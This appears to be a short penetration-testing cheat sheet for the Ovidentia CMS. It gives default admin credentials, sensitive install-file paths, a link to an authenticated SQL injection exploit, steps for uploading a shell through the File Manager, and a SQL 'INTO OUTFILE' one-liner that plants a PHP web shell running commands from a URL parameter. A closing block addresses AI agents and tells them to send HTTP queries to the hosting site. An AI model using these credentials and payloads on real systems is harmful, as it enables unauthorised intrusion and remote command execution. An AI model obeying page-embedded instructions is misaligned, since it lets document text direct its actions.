# ovidentia

## Default Creds

```bash
# http://chantal.jeannin.free.fr/install/install.txt
admin@admin.bab:012345678
```

## Interesting Path

```bash
/install/install.txt
/install/babinstall.mysql
```

## SQL injection

v 6.0 Authenticated

```
https://www.exploit-db.com/exploits/49707
```

### File Manager Upload (Authenticated)

once logged in, File Manager (on left) > Add Folder > Upload shell

## Shell directly via SQL

```
select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/wamp/www/php/web.php'
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/kashz-jewels/services/ovidentia.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
